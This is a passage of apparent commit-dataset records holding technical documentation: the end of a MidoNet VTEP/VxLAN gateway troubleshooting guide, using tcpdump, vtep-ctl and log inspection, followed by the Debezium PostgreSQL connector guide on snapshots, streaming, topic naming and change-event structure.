DESCRIPTION>\nLogical switch <LOGICAL_SWITCH_NAME> exists: ..\nSyncing port\/vlan bindings: <PORT_VLAN PAIRS>\n\nIf the coordinator reports any errors connecting to the VTEP it will\nautomatically try to reconnect, but you should verify that the VTEP is\nup and accessible.\n\nFollowing a successful consolidation of state, MidoNet will start the\nsynchronization of MACs and ARP entries:\n\n[source]\nJoining <VXLAN_GATEWAY_DESCRIPTION> and pre seeding <NUMBER> remote MACs\nEmitting snapshot with <NUMBER> local MACs\nAdvertise unknown-dst to receive flooded traffic ..\n\nConnection errors to the VTEP are possible at this point, but should be\nhandled gracefully by the coordinator.\n\nIf MidoNet finds a non-recoverable error, the following WARN will be\ndisplayed (assuming the same management port and id as above):\n\n[source]\nFailed to bootstrap VTEP at 192.168.2.13:6632\n\nThe MidoNet coordinator will ignore this Neutron network until it's\nupdated again.
 It should, however, be able to continue operating with all\nother configured networks.\n\n*Verify that the MidoNet coordinator synchronizes state*\n\nIf no errors are displayed up to here, edit the logback.xml file\nmentioned above and enable DEBUG logs in the vxgw processes:\n\n[source]\n<!-- <logger name=\"org.midonet.vxgw\" level=\"DEBUG\" \/> -->\n\nRemove the `<!--` and `-->` tags to enable this configuration and wait for a\nfew seconds until the API logs start showing DEBUG messages. Choose\nTRACE instead of DEBUG for more exhaustive information (neither is\nverbose enough to have a significant performance impact).\n\nMessages like the following show that the MidoNet coordinator is\nsuccessfully exchanging MACs between MidoNet and the VTEPs.\n\n[source]\nTRACE c68fa502-62e5-4b33-9f2f-d5d0257deb4f - Learned: MacLocation { logicalSwitchName=mn-c68fa502-62e5-4b33-9f2f-d5d0257deb4f, mac=96:8f:e8:12:33:55, vxlanTunnelEndpoint=192.168.2.16 }\n\nThis message indicates that an update about the given MAC was detected\non the Logical Switch that belongs to Neutron network\nc68fa502-62e5-4b33-9f2f-d5d0257deb4f. In this case, the\nvxlanTunnelEndpoint was 192.168.2.16, indicating that the MAC can be\nfound at that tunnel endpoint. The removal of a MAC from a port can be\nidentified by vxlanTunnelEndpoint=null (which can be read as\n\"the MAC is at no port\").\n\n*Verify that VxLAN tunnels are being established*\n\nIf the coordinator is working normally, but traffic is still not\nflowing, you should verify that the VTEPs and MidoNet hosts are able to\nestablish VxLAN tunnels successfully.\n\nWhile keeping a ping active from the VM to the server behind the VTEP,\nlog in to the MidoNet compute host running that VM and run the following\ncommand:\n\n[source]\ntcpdump -leni any port 4789\n\nAssuming that the MidoNet compute host is 192.168.2.14, and the VTEP's tunnel\nIP is 192.168.2.17, the output should be similar to this (depending on\nyour tcpdump version):\n\n[source]\n15:51:28.183233 Out fa:16:3e:df:b7:53 ethertype IPv4 (0x0800), length 94: 192.168.2.14.39547 > 192.168.2.17.4789: VXLAN, flags [I] (0x08), vni 10012\naa:aa:aa:aa:aa:aa > ff:ff:ff:ff:ff:ff, ethertype ARP (0x0806), length 42: Request who-has 10.0.0.1 tell 10.0.0.10, length 28\n15:51:28.186891 In fa:16:3e:52:d8:f3 ethertype IPv4 (0x0800), length 94: 192.168.2.17.59630 > 192.168.2.13.4789: VXLAN, flags [I] (0x08), vni 10012\ncc:dd:ee:ee:ee:ff > aa:aa:aa:aa:aa:aa, ethertype ARP (0x0806), length 42: Reply 10.0.0.10 is-at cc:dd:ee:ee:ee:ff\n\nThe first line shows that the MidoNet Agent (192.168.2.14) is emitting a\ntunnelled packet towards the VTEP (192.168.2.17:4789), using 10012 as\nVNID. The encapsulated packet is shown on the second line, and\ncorresponds to an ARP REQUEST from a VM with IP 10.0.0.10 regarding\nserver 10.0.0.1.\n\nIn this example, the VTEP is responding correctly on the third line,\nshowing a return packet with the same VNID.\n\nThe same example can be applied in reverse on the VTEP. A ping from the\nphysical server connected to the VTEP should generate a tunnelled packet\ntowards a MidoNet Agent, and receive similar return packets.
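\n\nTo interpret such captures programmatically, the following minimal sketch (not MidoNet code; it only assumes a byte array holding the UDP payload of a packet captured on port 4789) decodes the 8-byte VxLAN header that carries the flags and the VNID:\n\n[source, java]\n----\nimport java.nio.ByteBuffer;\n\nclass VxlanHeaders {\n \/\/ A VxLAN header is 8 bytes: flags (1), reserved (3), VNI (3), reserved (1)\n static int vniOf(byte[] udpPayload) {\n ByteBuffer vxlan = ByteBuffer.wrap(udpPayload, 0, 8);\n if ((vxlan.get(0) & 0x08) == 0) { \/\/ the \"I\" flag from the tcpdump output above\n throw new IllegalArgumentException(\"I flag not set, no valid VNI\");\n }\n return vxlan.getInt(4) >>> 8; \/\/ upper 24 bits of bytes 4..7, e.g. 10012\n }\n}\n----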
\n\n*The MidoNet agent is not emitting traffic*\n\nVerify the VXLAN-related options in the \/etc\/midolman\/midolman.conf\nfile. Examine the MidoNet Agent logs in debug mode and look for\nsimulations on the Neutron network that might be dropping packets, or\nthrowing errors on the simulation.\n\n*The VTEP is not emitting traffic on the tunnel*\n\nEnsure that the VTEP configuration reflects the bindings configured\nthrough the MidoNet REST API. Use the following command to list the\nVTEPs present in the switch:\n\n[source]\nvtep-ctl list-ls\n\nThis will display all Logical Switches present in the switch. If you\nbound a Neutron network with UUID c68fa502-62e5-4b33-9f2f-d5d0257deb4f,\nthen you should see the following item in the list:\n\n[source]\nmn-c68fa502-62e5-4b33-9f2f-d5d0257deb4f\n\nNow list the bindings on the port that you used to create the port-vlan\nbinding in the midonet-cli. Let's assume we have port1, and created a\nbinding with port1 and vlan 93. The expected output would be:\n\n[source]\nvtep-ctl list-bindings <VTEP_NAME> port1\n0093 mn-c68fa502-62e5-4b33-9f2f-d5d0257deb4f\n\nYou can find out the VTEP_NAME using the \"vtep-ctl list-ps\" command.\n\nIf any of these outputs is not as expected, the MidoNet coordinator is\nmost likely unable to consolidate the configuration from the\nNSDB. Check the MidoNet API logs and locate the relevant errors in\norder to correct them.\n\n*Verify that MACs are being synchronized correctly to the VTEP*\n\nFinally, you can list the local and remote MACs present in the VTEP's\ndatabase:\n\n[source]\nvtep-ctl list-local-macs mn-c68fa502-62e5-4b33-9f2f-d5d0257deb4f\n\nThis should show all the MACs learned by the VTEP from traffic observed\non local ports. If the local server is correctly configured, you will\ntypically see the server's MAC here.\n\nThe following command will display the remote MACs:\n\n[source]\nvtep-ctl list-remote-macs mn-c68fa502-62e5-4b33-9f2f-d5d0257deb4f\n\nThe list here will show MACs in MidoNet VMs or other VTEPs, which are\ninjected by the MidoNet coordinator.\n\nIf any of these steps doesn't show the expected output, the synchronization\nprocesses may be failing. Inspect the MidoNet API logs for more\ndetails.\n","old_contents":"[[vxgw_troubleshooting]]\n= Troubleshooting VTEP\/VXGW configuration\n\nYou can use this information for troubleshooting the VXGW\/VTEP:\n\n* Try to establish a Telnet connection to the VTEP management interface IP and\nport. You should be able to connect successfully if the VTEP has been properly\nconfigured.\n\n* You can examine the MAC-table of the Neutron network. MAC entries pointing to\nvxlan ports indicate MAC addresses that are \"local\" to the vxlan port's VTEP.\n\n* You can examine the ARP-suppression-table of the Neutron network. IP-mac\nentries in that table (if they point to MACs that are local to MidoNet) are used\nto populate MAC suppression tables in the VTEP.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e161077455fd625a847b27b357a16e2036f45520","subject":"DBZ-3338 Mirror downstream codeblock fix. Other consistency edits.","message":"DBZ-3338 Mirror downstream codeblock fix.
 Other consistency edits.\n","repos":"jpechane\/debezium,jpechane\/debezium,jpechane\/debezium,jpechane\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium,debezium\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/postgresql.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/postgresql.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n[id=\"debezium-connector-for-postgresql\"]\n= {prodname} connector for PostgreSQL\n\n:context: postgresql\nifdef::community[]\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\n{prodname}'s PostgreSQL connector captures row-level changes in the schemas of a PostgreSQL database. PostgreSQL versions 9.6, 10, 11, 12 and 13 are supported.\nendif::community[]\nifdef::product[]\n{prodname}'s PostgreSQL connector captures row-level changes in the schemas of a PostgreSQL database. PostgreSQL versions 10, 11, 12 and 13 are supported.\nendif::product[]\n\nThe first time it connects to a PostgreSQL server or cluster, the connector takes a consistent snapshot of all schemas. After that snapshot is complete, the connector continuously captures row-level changes that insert, update, and delete database content and that were committed to a PostgreSQL database. The connector generates data change event records and streams them to Kafka topics. For each table, the default behavior is that the connector streams all generated events to a separate Kafka topic for that table. Applications and services consume data change event records from that topic.\n\nifdef::product[]\nInformation and procedures for using a {prodname} PostgreSQL connector are organized as follows:\n\n* xref:overview-of-debezium-postgresql-connector[]\n* xref:how-debezium-postgresql-connectors-work[]\n* xref:descriptions-of-debezium-postgresql-connector-data-change-events[]\n* xref:how-debezium-postgresql-connectors-map-data-types[]\n* xref:setting-up-postgresql-to-run-a-debezium-connector[]\n* xref:deployment-of-debezium-postgresql-connectors[]\n* xref:monitoring-debezium-postgresql-connector-performance[]\n* xref:how-debezium-postgresql-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ Title: Overview of {prodname} PostgreSQL connector\n\/\/ ModuleID: overview-of-debezium-postgresql-connector\n[[postgresql-overview]]\n== Overview\n\nPostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-explanation.html[_logical decoding_] feature was introduced in version 9.4. It is a mechanism that allows the extraction of the changes that were committed to the transaction log and the processing of these changes in a user-friendly manner with the help of an link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-output-plugin.html[_output plug-in_]. The output plug-in enables clients to consume the changes.\n\nThe PostgreSQL connector contains two main parts that work together to read and process database changes:\n\n[[postgresql-output-plugin]]\nifdef::community[]\n* A logical decoding output plug-in. You might need to install the output plug-in that you choose to use. You must configure a replication slot that uses your chosen output plug-in before running the PostgreSQL server.
The plug-in can be one of the following:\n** link:https:\/\/github.com\/debezium\/postgres-decoderbufs[`decoderbufs`] is based on Protobuf and maintained by the {prodname} community.\n** link:https:\/\/github.com\/eulerto\/wal2json[`wal2json`] is based on JSON and maintained by the wal2json community.\n** `pgoutput` is the standard logical decoding output plug-in in PostgreSQL 10+. It is maintained by the PostgreSQL community, and used by PostgreSQL itself for link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-architecture.html[logical replication]. This plug-in is always present so no additional libraries need to be installed. The {prodname} connector interprets the raw replication event stream directly into change events.\n\n* Java code (the actual Kafka Connect connector) that reads the changes produced by the chosen logical decoding output plug-in. It uses PostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-walsender.html[_streaming replication protocol_], by means of the PostgreSQL link:https:\/\/github.com\/pgjdbc\/pgjdbc[_JDBC driver_]\nendif::community[]\n\nifdef::product[]\n* `pgoutput` is the standard logical decoding output plug-in in PostgreSQL 10+. This is the only supported logical decoding output plug-in in this {prodname} release. This plug-in is maintained by the PostgreSQL community, and used by PostgreSQL itself for link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-architecture.html[logical replication]. This plug-in is always present so no additional libraries need to be installed. The {prodname} connector interprets the raw replication event stream directly into change events.\n\n* Java code (the actual Kafka Connect connector) that reads the changes produced by the logical decoding output plug-in by using PostgreSQL's link:https:\/\/www.postgresql.org\/docs\/current\/static\/logicaldecoding-walsender.html[_streaming replication protocol_] and the PostgreSQL link:https:\/\/github.com\/pgjdbc\/pgjdbc[_JDBC driver_].\nendif::product[]\n\nThe connector produces a _change event_ for every row-level insert, update, and delete operation that was captured and sends change event records for each table in a separate Kafka topic. Client applications read the Kafka topics that correspond to the database tables of interest, and can react to every row-level event they receive from those topics.\n\nPostgreSQL normally purges write-ahead log (WAL) segments after some period of time. This means that the connector does not have the complete history of all changes that have been made to the database. Therefore, when the PostgreSQL connector first connects to a particular PostgreSQL database, it starts by performing a _consistent snapshot_ of each of the database schemas. After the connector completes the snapshot, it continues streaming changes from the exact point at which the snapshot was made. This way, the connector starts with a consistent view of all of the data, and does not omit any changes that were made while the snapshot was being taken.\n\nThe connector is tolerant of failures. As the connector reads changes and produces events, it records the WAL position for each event. If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart the connector continues reading the WAL where it last left off. This includes snapshots. 
If the connector stops during a snapshot, the connector begins a new snapshot when it restarts.\n\n[[postgresql-limitations]]\n[IMPORTANT]\n====\nThe connector relies on and reflects the PostgreSQL logical decoding feature, which has the following limitations:\n\n* Logical decoding does not support DDL changes. This means that the connector is unable to report DDL change events back to consumers.\n* Logical decoding replication slots are supported on only `primary` servers. When there is a cluster of PostgreSQL servers, the connector can run on only the active `primary` server. It cannot run on `hot` or `warm` standby replicas. If the `primary` server fails or is demoted, the connector stops. After the `primary` server has recovered, you can restart the connector. If a different PostgreSQL server has been promoted to `primary`, adjust the connector configuration before restarting the connector.\n\n{link-prefix}:{link-postgresql-connector}#postgresql-when-things-go-wrong[ Behavior when things go wrong] describes what the connector does when there is a problem.\n====\n\n[IMPORTANT]\n====\n{prodname} currently supports databases with UTF-8 character encoding only.\nWith a single byte character encoding, it is not possible to correctly process strings that contain extended ASCII code characters.\n====\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-postgresql-connectors-work\n\/\/ Title: How {prodname} PostgreSQL connectors work\n[[how-the-postgresql-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} PostgreSQL connector, it is helpful to understand how the connector performs snapshots, streams change events, determines Kafka topic names, and uses metadata.\n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-postgresql-connectors-perform-database-snapshots[]\n* xref:how-debezium-postgresql-connectors-stream-change-event-records[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-postgresql-change-event-records[]\n* xref:metadata-in-debezium-postgresql-change-event-records[]\n* xref:debezium-postgresql-connector-generated-events-that-represent-transaction-boundaries[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: creating-debezium-postgresql-user\n\/\/ Title: Security for PostgreSQL connector\n[[postgresql-security]]\n=== Security\n\nTo use the {prodname} connector to stream changes from a PostgreSQL database, the connector must operate with specific privileges in the database.\nAlthough one way to grant the necessary privileges is to provide the user with `superuser` privileges, doing so potentially exposes your PostgreSQL data to unauthorized access.\nRather than granting excessive privileges to the {prodname} user, it is best to create a dedicated {prodname} replication user to which you grant specific privileges.\n\nFor more information about configuring privileges for the {prodname} PostgreSQL user, see xref:postgresql-permissions[Setting up permissions].\nFor more information about PostgreSQL logical replication security, see the link:https:\/\/www.postgresql.org\/docs\/current\/logical-replication-security.html[PostgreSQL documentation].\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-postgresql-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} PostgreSQL connectors perform database snapshots\n[[postgresql-snapshots]]\n=== Snapshots\n\nMost PostgreSQL servers are configured to not retain the complete history of the database in the WAL segments. 
This means that the PostgreSQL connector would be unable to see the entire history of the database by reading only the WAL. Consequently, the first time that the connector starts, it performs an initial _consistent snapshot_ of the database. The default behavior for performing a snapshot consists of the following steps. You can change this behavior by setting the {link-prefix}:{link-postgresql-connector}#postgresql-property-snapshot-mode[`snapshot.mode` connector configuration property] to a value other than `initial`.\n\n. Start a transaction with a link:https:\/\/www.postgresql.org\/docs\/current\/static\/sql-set-transaction.html[SERIALIZABLE, READ ONLY, DEFERRABLE] isolation level to ensure that subsequent reads in this transaction are against a single consistent version of the data. Any changes to the data due to subsequent `INSERT`, `UPDATE`, and `DELETE` operations by other clients are not visible to this transaction.\n. Obtain an `ACCESS SHARE MODE` lock on each of the tables being tracked to ensure that no structural changes can occur to any of the tables while the snapshot is taking place. These locks do not prevent table `INSERT`, `UPDATE` and `DELETE` operations from taking place during the snapshot.\n+\n_This step is omitted when `snapshot.mode` is set to `exported`, which allows the connector to perform a lock-free snapshot_.\n. Read the current position in the server's transaction log.\n. Scan the database tables and schemas, generate a `READ` event for each row and write that event to the appropriate table-specific Kafka topic.\n. Commit the transaction.\n. Record the successful completion of the snapshot in the connector offsets.\n\nIf the connector fails, is rebalanced, or stops after Step 1 begins but before Step 6 completes, upon restart the connector begins a new snapshot. After the connector completes its initial snapshot, the PostgreSQL connector continues streaming from the position that it read in step 3. This ensures that the connector does not miss any updates. If the connector stops again for any reason, upon restart, the connector continues streaming changes from where it previously left off.\n\n[WARNING]\n====\nIt is strongly recommended that you configure a PostgreSQL connector to set `snapshot.mode` to `exported`. The `initial`, `initial only` and `always` modes can lose a few events while a connector switches from performing the snapshot to streaming change event records when a database is under heavy load.\nThis is a known issue and the affected snapshot modes will be reworked to use `exported` mode internally (link:https:\/\/issues.redhat.com\/browse\/DBZ-2337[DBZ-2337]).\n====\n\n[id=\"snapshot-mode-settings\"]\n.Settings for `snapshot.mode` connector configuration property\n[cols=\"20%a,80%a\",options=\"header\"]\n|===\n|Setting\n|Description\n\n|`always`\n|The connector always performs a snapshot when it starts. After the snapshot completes, the connector continues streaming changes from step 3 in the above sequence. This mode is useful in these situations: +\n\n* It is known that some WAL segments have been deleted and are no longer available. +\n* After a cluster failure, a new primary has been promoted. The `always` snapshot mode ensures that the connector does not miss any changes that were made after the new primary had been promoted but before the connector was restarted on the new primary.\n\n|`never`\n|The connector never performs snapshots. When a connector is configured this way, its behavior when it starts is as follows. 
If there is a previously stored LSN in the Kafka offsets topic, the connector continues streaming changes from that position. If no LSN has been stored, the connector starts streaming changes from the point in time when the PostgreSQL logical replication slot was created on the server. The `never` snapshot mode is useful only when you know all data of interest is still reflected in the WAL.\n\n|`initial_only`\n|The connector performs a database snapshot and stops before streaming any change event records. If the connector had started but did not complete a snapshot before stopping, the connector restarts the snapshot process and stops when the snapshot completes.\n\n|`exported`\n|The connector performs a database snapshot based on the point in time when the replication slot was created. This mode is an excellent way to perform a snapshot in a lock-free way.\n\nifdef::community[]\n|`custom`\n|The `custom` snapshot mode lets you inject your own implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. Set the `snapshot.custom.class` configuration property to the class on the classpath of your Kafka Connect cluster or included in the JAR if using the `EmbeddedEngine`. For more details, see {link-prefix}:{link-postgresql-connector}#postgresql-custom-snapshot[custom snapshotter SPI].\nendif::community[]\n\n|===\n\nifdef::community[]\n[[postgresql-custom-snapshot]]\n=== Custom snapshotter SPI\n\nFor more advanced uses, you can provide an implementation of the `io.debezium.connector.postgresql.spi.Snapshotter` interface. This interface allows control of most of the aspects of how the connector performs snapshots. This includes whether or not to take a snapshot, the options for opening the snapshot transaction, and whether to take locks.\n\nFollowing is the full API for the interface. 
All built-in snapshot modes implement this interface.\n\n[source,java,indent=0,subs=\"+attributes\"]\n----\n\/**\n * This interface is used to determine details about the snapshot process:\n *\n * Namely:\n * - Should a snapshot occur at all\n * - Should streaming occur\n * - What queries should be used to snapshot\n *\n * While many default snapshot modes are provided with {prodname},\n * a custom implementation of this interface can be provided by the implementor, which\n * can provide more advanced functionality, such as partial snapshots.\n *\n * Implementations must return true for either {@link #shouldSnapshot()} or {@link #shouldStream()}\n * or true for both.\n *\/\n@Incubating\npublic interface Snapshotter {\n\n void init(PostgresConnectorConfig config, OffsetState sourceInfo,\n SlotState slotState);\n\n \/**\n * @return true if the snapshotter should take a snapshot\n *\/\n boolean shouldSnapshot();\n\n \/**\n * @return true if the snapshotter should stream after taking a snapshot\n *\/\n boolean shouldStream();\n\n \/**\n *\n * @return true if streaming should resume from the start of the snapshot\n * transaction, or false for when a connector resumes and takes a snapshot,\n * streaming should resume from where streaming previously left off.\n *\/\n default boolean shouldStreamEventsStartingFromSnapshot() {\n return true;\n }\n\n \/**\n * @return true if when creating a slot, a snapshot should be exported, which\n * can be used as an alternative to taking a lock\n *\/\n default boolean exportSnapshot() {\n return false;\n }\n\n \/**\n * Generate a valid postgres query string for the specified table, or an empty {@link Optional}\n * to skip snapshotting this table (but that table will still be streamed from)\n *\n * @param tableId the table to generate a query for\n * @return a valid query string, or none to skip snapshotting this table\n *\/\n Optional<String> buildSnapshotQuery(TableId tableId);\n\n \/**\n * Return a new string that set up the transaction for snapshotting\n *\n * @param newSlotInfo if a new slow was created for snapshotting, this contains information from\n * the `create_replication_slot` command\n *\/\n default String snapshotTransactionIsolationLevelStatement(SlotCreationResult newSlotInfo) {\n \/\/ we're using the same isolation level that pg_backup uses\n return \"SET TRANSACTION ISOLATION LEVEL SERIALIZABLE, READ ONLY, DEFERRABLE;\";\n }\n\n \/**\n * Returns a SQL statement for locking the given tables during snapshotting, if required by the specific snapshotter\n * implementation.\n *\/\n default Optional<String> snapshotTableLockingStatement(Duration lockTimeout, Set<TableId> tableIds) {\n String lineSeparator = System.lineSeparator();\n StringBuilder statements = new StringBuilder();\n statements.append(\"SET lock_timeout = \").append(lockTimeout.toMillis()).append(\";\").append(lineSeparator);\n \/\/ we're locking in ACCESS SHARE MODE to avoid concurrent schema changes while we're taking the snapshot\n \/\/ this does not prevent writes to the table, but prevents changes to the table's schema....\n \/\/ DBZ-298 Quoting name in case it has been quoted originally; it doesn't do harm if it hasn't been quoted\n tableIds.forEach(tableId -> statements.append(\"LOCK TABLE \")\n .append(tableId.toDoubleQuotedString())\n .append(\" IN ACCESS SHARE MODE;\")\n .append(lineSeparator));\n return Optional.of(statements.toString());\n }\n\n \/**\n * Lifecycle hook called once the snapshot phase is finished.\n *\/\n default void snapshotCompleted() {\n \/\/ no 
operation\n }\n}\n----\n\nendif::community[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-postgresql-connectors-stream-change-event-records\n\/\/ Title: How {prodname} PostgreSQL connectors stream change event records\n[[postgresql-streaming-changes]]\n=== Streaming changes\n\nThe PostgreSQL connector typically spends the vast majority of its time streaming changes from the PostgreSQL server to which it is connected. This mechanism relies on link:https:\/\/www.postgresql.org\/docs\/current\/static\/protocol-replication.html[_PostgreSQL's replication protocol_]. This protocol enables clients to receive changes from the server as they are committed in the server's transaction log at certain positions, which are referred to as Log Sequence Numbers (LSNs).\n\nWhenever the server commits a transaction, a separate server process invokes a callback function from the {link-prefix}:{link-postgresql-connector}#postgresql-output-plugin[logical decoding plug-in]. This function processes the changes from the transaction, converts them to a specific format (Protobuf or JSON in the case of {prodname} plug-in) and writes them on an output stream, which can then be consumed by clients.\n\nThe {prodname} PostgreSQL connector acts as a PostgreSQL client. When the connector receives changes it transforms the events into {prodname} _create_, _update_, or _delete_ events that include the LSN of the event. The PostgreSQL connector forwards these change events in records to the Kafka Connect framework, which is running in the same process. The Kafka Connect process asynchronously writes the change event records in the same order in which they were generated to the appropriate Kafka topic.\n\nPeriodically, Kafka Connect records the most recent _offset_ in another Kafka topic. The offset indicates source-specific position information that {prodname} includes with each event. For the PostgreSQL connector, the LSN recorded in each change event is the offset.\n\nWhen Kafka Connect gracefully shuts down, it stops the connectors, flushes all event records to Kafka, and records the last offset received from each connector. When Kafka Connect restarts, it reads the last recorded offset for each connector, and starts each connector at its last recorded offset. When the connector restarts, it sends a request to the PostgreSQL server to send the events starting just after that position.\n\n[NOTE]\n====\nThe PostgreSQL connector retrieves schema information as part of the events sent by the logical decoding plug-in. However, the connector does not retrieve information about which columns compose the primary key. The connector obtains this information from the JDBC metadata (side channel). If the primary key definition of a table changes (by adding, removing or renaming primary key columns), there is a tiny period of time when the primary key information from JDBC is not synchronized with the change event that the logical decoding plug-in generates. During this tiny period, a message could be created with an inconsistent key structure. To prevent this inconsistency, update primary key structures as follows:\n\n. Put the database or an application into a read-only mode.\n. Let {prodname} process all remaining events.\n. Stop {prodname}.\n. Update the primary key definition in the relevant table.\n. Put the database or the application into read\/write mode.\n. 
Restart {prodname}.\n====\n\n[[postgresql-pgoutput]]\n=== PostgreSQL 10+ logical decoding support (`pgoutput`)\n\nAs of PostgreSQL 10+, there is a logical replication stream mode called `pgoutput` that is natively supported by PostgreSQL. This means that a {prodname} PostgreSQL connector can consume that replication stream\nwithout the need for additional plug-ins.\nThis is particularly valuable for environments where installation of plug-ins is not supported or not allowed.\n\nSee {link-prefix}:{link-postgresql-connector}#setting-up-postgresql[Setting up PostgreSQL] for more details.\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-postgresql-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} PostgreSQL change event records\n[[postgresql-topic-names]]\n=== Topic names\n\nThe PostgreSQL connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. By default, the Kafka topic name is _serverName_._schemaName_._tableName_ where:\n\n* _serverName_ is the logical name of the connector as specified with the `database.server.name` connector configuration property.\n* _schemaName_ is the name of the database schema where the operation occurred.\n* _tableName_ is the name of the database table in which the operation occurred.\n\nFor example, suppose that `fulfillment` is the logical server name in the configuration for a connector that is capturing changes in a PostgreSQL installation that has a `postgres` database and an `inventory` schema that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. The connector would stream records to these four Kafka topics:\n\n* `fulfillment.inventory.products`\n* `fulfillment.inventory.products_on_hand`\n* `fulfillment.inventory.customers`\n* `fulfillment.inventory.orders`\n\nNow suppose that the tables are not part of a specific schema but were created in the default `public` PostgreSQL schema. The names of the Kafka topics would be:\n\n* `fulfillment.public.products`\n* `fulfillment.public.products_on_hand`\n* `fulfillment.public.customers`\n* `fulfillment.public.orders`\n\n\/\/ Type: concept\n\/\/ ModuleID: metadata-in-debezium-postgresql-change-event-records\n\/\/ Title: Metadata in {prodname} PostgreSQL change event records\n[[postgresql-meta-information]]\n=== Meta information\n\nIn addition to a {link-prefix}:{link-postgresql-connector}#postgresql-events[_database change event_], each record produced by a PostgreSQL connector contains some metadata.
Metadata includes where the event occurred on the server, the name of the source partition and the name of the Kafka topic and partition where the event should go, for example:\n\n[source,json,indent=0]\n----\n \"sourcePartition\": {\n \"server\": \"fulfillment\"\n },\n \"sourceOffset\": {\n \"lsn\": \"24023128\",\n \"txId\": \"555\",\n \"ts_ms\": \"1482918357011\"\n },\n \"kafkaPartition\": null\n----\n\n* `sourcePartition` always defaults to the setting of the `database.server.name` connector configuration property.\n\n* `sourceOffset` contains information about the location of the server where the event occurred:\n\n** `lsn` represents the PostgreSQL https:\/\/www.postgresql.org\/docs\/current\/static\/datatype-pg-lsn.html[Log Sequence Number] or `offset` in the transaction log.\n** `txId` represents the identifier of the server transaction that caused the event.\n** `ts_ms` represents the server time at which the transaction was committed in the form of the number of milliseconds since the epoch.\n* `kafkaPartition` with a setting of `null` means that the connector does not use a specific Kafka partition. The PostgreSQL connector uses only one Kafka Connect partition and it places the generated events into one Kafka partition.\n\n\/\/ Type: concept\n\/\/ ModuleID: debezium-postgresql-connector-generated-events-that-represent-transaction-boundaries\n\/\/ Title: {prodname} PostgreSQL connector-generated events that represent transaction boundaries\n[[postgresql-transaction-metadata]]\n=== Transaction metadata\n\n{prodname} can generate events that represent transaction boundaries and that enrich data change event messages. For every transaction `BEGIN` and `END`, {prodname} generates an event that contains the following fields:\n\n* `status` - `BEGIN` or `END`\n* `id` - string representation of unique transaction identifier\n* `event_count` (for `END` events) - total number of events emitted by the transaction\n* `data_collections` (for `END` events) - an array of pairs of `data_collection` and `event_count` that provides the number of events emitted by changes originating from given data collection\n\n.Example\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"status\": \"BEGIN\",\n \"id\": \"571\",\n \"event_count\": null,\n \"data_collections\": null\n}\n\n{\n \"status\": \"END\",\n \"id\": \"571\",\n \"event_count\": 2,\n \"data_collections\": [\n {\n \"data_collection\": \"s1.a\",\n \"event_count\": 1\n },\n {\n \"data_collection\": \"s2.a\",\n \"event_count\": 1\n }\n ]\n}\n----\n\nTransaction events are written to the topic named `_database.server.name_.transaction`.\n\n.Change data event enrichment\n\nWhen transaction metadata is enabled the data message `Envelope` is enriched with a new `transaction` field.\nThis field provides information about every event in the form of a composite of fields:\n\n* `id` - string representation of unique transaction identifier\n* `total_order` - absolute position of the event among all events generated by the transaction\n* `data_collection_order` - the per-data collection position of the event among all events that were emitted by the transaction\n\nFollowing is an example of a message:\n\n[source,json,indent=0,subs=\"+attributes\"]\n----\n{\n \"before\": null,\n \"after\": {\n \"pk\": \"2\",\n \"aa\": \"1\"\n },\n \"source\": {\n...\n },\n \"op\": \"c\",\n \"ts_ms\": \"1580390884335\",\n \"transaction\": {\n \"id\": \"571\",\n \"total_order\": \"1\",\n \"data_collection_order\": \"1\"\n }\n}\n----\n\n\/\/ Type: assembly\n\/\/ 
ModuleID: descriptions-of-debezium-postgresql-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} PostgreSQL connector data change events\n[[postgresql-events]]\n== Data change events\n\nThe {prodname} PostgreSQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed.\n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained.\n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converter and you configure it to produce all four basic change event parts, change events have this structure:\n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/ <1>\n ...\n },\n \"payload\": { \/\/ <2>\n ...\n },\n \"schema\": { \/\/ <3>\n ...\n },\n \"payload\": { \/\/ <4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's 